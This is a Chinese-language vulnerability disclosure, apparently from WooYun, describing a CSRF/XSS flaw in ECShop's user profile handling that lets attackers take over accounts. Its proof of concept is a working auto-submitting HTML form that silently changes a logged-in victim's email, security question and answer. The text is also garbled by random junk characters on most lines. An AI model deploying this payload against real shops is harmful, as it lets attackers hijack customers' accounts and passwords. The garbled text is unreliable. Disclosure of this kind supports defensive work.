简要描述:* H+ ]5 v0 V$ h2 e
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现0 ?- y$ z0 w5 g4 f* u
3 r9 S) c4 O, ^ S- U1 KDemo For:http://www.wooyun.org/bug.php?action=view&id=395 R5 K5 B2 T* H8 L
$ E5 r* L3 V. c% r% M
详细说明:
5 P* f: p N; _% T2 Q7 K利用csrf和xss可以突破官方所说的“障碍”+ ~$ V% Z$ P* i$ A* J5 H: Z$ T
xss版本已经有人说明& S: a+ G( O8 O, P; K
这里给出csrf版本
5 D4 W: ^* T# z6 @7 R# n$ r, O2 S! }% A$ W$ z5 f
漏洞证明:" r/ ?$ H5 n1 u* B& W4 F3 a. J3 l
<html>6 E; m. \/ B: E5 [
<body>1 ^* I$ G! F( H$ w0 e
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
1 C' v {* w5 j# z; A; y4 t<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">& w6 c1 O% J: v$ G8 N
<INPUT TYPE="text" NAME="act" value="act_edit_profile">) G* k i5 ]/ a& ?+ q
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
4 N3 P; S4 o7 X6 A8 g# q<INPUT TYPE="text" NAME="passwd_answer" value="exploit">- V9 u; h8 s+ ?) j, `7 d% z' D4 W
</body>
$ m0 u! e0 P) [<script>$ K1 u' c! q& q d0 {4 n
document.forms[0].submit();3 B% p3 J- A& k6 ~7 \
</script>* j0 ?' o& R# ]# |9 \
</html>( X' O. R7 f7 o$ P
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失1 Y: I$ e4 E; d9 c* e7 q
M1 t' I4 R( H- @
|